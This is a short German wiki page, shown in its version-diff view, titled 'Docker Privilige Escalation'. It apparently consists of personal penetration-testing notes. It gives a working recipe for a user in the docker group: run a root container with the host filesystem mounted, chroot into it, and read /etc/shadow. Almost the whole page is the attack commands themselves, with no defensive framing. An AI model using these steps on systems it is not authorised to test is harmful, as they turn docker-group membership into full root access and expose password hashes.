Docker Privilige Escalation: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=Auf dem Host= *docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash =Im Container= *chroot /mnt“) |
|||
| (2 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
| + | =Vorraussetzung= | ||
| + | User muss in der Gruppe docker sein | ||
| + | =Zugriff auf= | ||
| + | *srw-rw---- 1 root docker 0 Jul 16 08:38 /run/docker.sock | ||
=Auf dem Host= | =Auf dem Host= | ||
*docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash | *docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash | ||
=Im Container= | =Im Container= | ||
*chroot /mnt | *chroot /mnt | ||
| + | =Zugriff= | ||
| + | *cat /etc/shadow | ||
Aktuelle Version vom 16. Juli 2021, 13:46 Uhr
Vorraussetzung
User muss in der Gruppe docker sein
Zugriff auf
- srw-rw---- 1 root docker 0 Jul 16 08:38 /run/docker.sock
Auf dem Host
- docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash
Im Container
- chroot /mnt
Zugriff
- cat /etc/shadow